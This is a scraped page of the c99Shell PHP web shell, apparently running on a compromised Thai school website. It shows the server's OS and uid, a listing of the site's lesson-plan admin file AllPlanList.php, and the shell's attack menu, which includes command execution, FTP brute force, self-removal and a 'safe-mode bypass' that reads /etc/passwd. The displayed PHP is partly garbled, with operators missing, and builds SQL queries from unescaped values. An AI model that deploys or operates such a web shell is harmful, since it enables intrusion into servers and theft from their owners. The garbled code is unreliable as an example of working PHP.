!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/admin/   drwxr-xr-x
Free 52.65 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AllPlanList.php (7.39 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
 session_start();
 include("../include/FunctionDB.php");
 if (session_is_registered("valid_user"))
 {
$Username $valid_user;
ConnectDB();

/////////////////////////////////////////////////////
 $sql ="SELECT * FROM tech_plan_tb ";
  $result1mysql_query($sql) or die("Cannot Select").mysql_error();
  $num mysql_num_rows($result1);
 ?>
<html>
<head>
<title>Plan </title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link rel="stylesheet" href="../css/style1.css" type="text/css">
</head>

<body bgcolor="#FFFFFF">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td><table width="100%" border="0" cellpadding="0" cellspacing="2" bgcolor="#DBEFF7">
        <tr bgcolor="#DBEFF7" background="../teacher/Image/bart1.jpg"> 
          <td width="20%" height="25" bgcolor="#DBEFF7" background="../Image/bart1.jpg" class="table" > 
            <div align="center"><font size="2" face="Tahoma"><strong><a href="adminmenu.php" class="d">กลับหน้าหลัก</a></strong></font></div></td>
          <td width="20%" height="25" bgcolor="#DBEFF7" background="../Image/bart1.jpg" class="table" > 
            <div align="center"><font size="2" face="Tahoma"><strong><a href="../logout.php" class="d">Logout</a></strong></font></div></td>
        </tr>
      </table></td>
  </tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr> 
    <td><div align="center"></div></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" style="border:1px solid gray">
  <form action="DelPlan.php" method="post">
    <tr > 
      <td colspan="7" bgcolor="#D3E4F8"> <div align="center"><font color="#FFFF99" size="4" face="Tahoma"><strong><font color="#003366">รายการแผนการสอนรายวิชา</font></strong></font></div></td>
    </tr>
    <tr bordercolor="#006633"> 
      <td width="25" align="center" bgcolor="#CCCCCC"><div align="center"><font color="#993333" size="2" face="Tahoma"><strong>ลบ</strong></font></div></td>
      <td width="24" align="center" bgcolor="#CCCCCC"><font color="#003366" size="2" face="Tahoma"><b>no.</b></font></td>
      <td width="61" align="center" bgcolor="#CCCCCC"><font color="#003366" size="2" face="Tahoma"><b>รหัสวิชา</b></font></td>
      <td width="318" align="center" bgcolor="#CCCCCC"><font color="#003366" size="2" face="Tahoma"><b>ชื่อวิชา</b></font></td>
      <td width="111" align="center" bgcolor="#CCCCCC"><font color="#003366" size="2" face="Tahoma"><b>ภาคการสอน</b></font></td>
      <td width="95" align="center" bgcolor="#CCCCCC"><font color="#003366" size="2" face="Tahoma"><b>วันที่เิ่ริ่มสอน</b></font></td>
      <td align="center" bgcolor="#CCCCCC"><font color="#003366" size="2" face="Tahoma"><b>รายละเอียด</b></font></td>
    </tr>
    <?
$i 1;
 while($row mysql_fetch_array($result1))
 {

     if($count==0)
     {
?>
    <tr bordercolor="#eeeeee" > 
      <td align=center bgcolor="#eeeeee" > <input type="checkbox" name="checkbox[]" value="<? echo $row[Plan_code?>"></td>
      <td align=center bgcolor="#eeeeee" ><strong><font color="#003366" size="2" face="Tahoma"> 
        <?=$i?>
        </font></strong></td>
      <td align=center bgcolor="#eeeeee" > <div align="center"> <font color="#003366" size="2" face="Tahoma"> 
          <?php
            $Subject_no $row[Subject_no];
            $sql3 "Select * From subject_tb Where Subject_no='$Subject_no'";
            $result3 mysql_query($sql3) or die("Error".mysql_error());
            $rss3 mysql_fetch_array($result3);
            echo"$rss3[Subject_code]";
            ?>
          </font> </div></td>
      <td align=center bordercolor="#eeeeee" bgcolor="#eeeeee" > <div align="left"><font color="#003366" size="2" face="Tahoma"> 
          <?php 
             $Subject_no $row["Subject_no"];
            $strSQL1 "SELECT * FROM subject_tb WHERE Subject_no='$Subject_no' ";
            $res1mysql_query($strSQL1) or die("Error".mysql_error());
            $rs1 mysql_fetch_array($res1);
            echo"$rs1[Subject_name]";
           
    ?>
          </font></div></td>
      <td bgcolor="#eeeeee"> <div align="left"><font color="#003366" size="2" face="Tahoma"> 
          <?php 
             $Method_code $row["Method_code"];
            $strSQL2 "SELECT * FROM method_tb WHERE Method_code='$Method_code' ";
            $result2mysql_query($strSQL2);
              $rs2 mysql_fetch_array($result2);
            echo"$rs2[Method_name]";
           
    ?>
          </font></div></td>
      <td bgcolor="#eeeeee" > <div align="center"><font color="#003366" size="2" face="Tahoma"> 
          <?=$row["Start_date"]?>
          </font></div></td>
      <td bordercolor="#eeeeee" bgcolor="#eeeeee" > <div align="center"><font color="#000000" size="2" face="Tahoma">&nbsp;<a href="../teacher/tech_plan/ShowTechPlan.php?Teacher_code=<? echo $row[Teacher_code]?>&Plan_code=<?echo $row[Plan_code]?>" class="g">แผนการสอน</a></font></div></td>
    </tr>
    <?
    $count=1;
     }
else
{
?>
    <tr bordercolor="#FFFFFF"> 
      <td align="center" bgcolor="#FFFFFF" ><input type="checkbox" name="checkbox[]2" value="<? echo $row[Plan_code?>"></td>
      <td align="center" bgcolor="#FFFFFF" ><strong><font color="#003366" size="2" face="Tahoma"> 
        <?=$i?>
        </font></strong></td>
      <td align=center bordercolor="#eeeeee" bgcolor="#FFFFFF" > <div align="center"> 
          <font color="#003366" size="2" face="Tahoma"> 
          <?php
            $Subject_no $row[Subject_no];
            $sql3 "Select * From subject_tb Where Subject_no='$Subject_no'";
            $result3 mysql_query($sql3) or die("Error".mysql_error());
            $rss3 mysql_fetch_array($result3);
            echo"$rss3[Subject_code]";
            ?>
          </font> </div></td>
      <td align="center" > <div align="left"><font color="#003366" size="2" face="Tahoma"> 
          <?php 
             $Subject_no $row["Subject_no"];
            $strSQL1 "SELECT * FROM subject_tb WHERE Subject_no='$Subject_no' ";
            $res1mysql_query($strSQL1) or die("Error".mysql_error());
            $rs1 mysql_fetch_array($res1);
            echo"$rs1[Subject_name]";
           
    ?>
          </font></div></td>
      <td bgcolor="#FFFFFF"> <div align="left"><font color="#003366" size="2" face="Tahoma"> 
          <?php 
             $Method_code $row["Method_code"];
            $strSQL2 "SELECT * FROM method_tb WHERE Method_code='$Method_code' ";
            $result2mysql_query($strSQL2);
              $rs2 mysql_fetch_array($result2);
            echo"$rs2[Method_name]";
           
    ?>
          </font></div></td>
      <td bgcolor="#FFFFFF" > <div align="center"><font color="#003366" size="2" face="Tahoma"> 
          <?=$row["Start_date"]?>
          </font></div></td>
      <td bgcolor="#FFFFFF" > <div align="center"><font color="#000000" size="2" face="Tahoma">&nbsp;<a href="../teacher/tech_plan/ShowTechPlan.php?Teacher_code=<? echo $row[Teacher_code]?>&Plan_code=<?echo $row[Plan_code]?>" class="g">แผนการสอน</a></font></div></td>
    </tr>
    <?
$count=0;
}
$i++;
 }    
CloseDB();
?>
    <tr> 
      <td colspan="7" align="center" bgcolor="#CCCCCC"> <div align="center"><font color="#003366" size="2" face="Tahoma">ทั้งหมด 
          <? echo $num ?> รายการ</font></div></td>
    <tr> 
      <td height="24" colspan="7" align="center" bgcolor="#D3E4F8"> <input type="submit" name="Submit" value="   ลบ   "></td>
  </form>
</table>
</body>
</html>
<?php 
    }
else
{
       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0072 ]--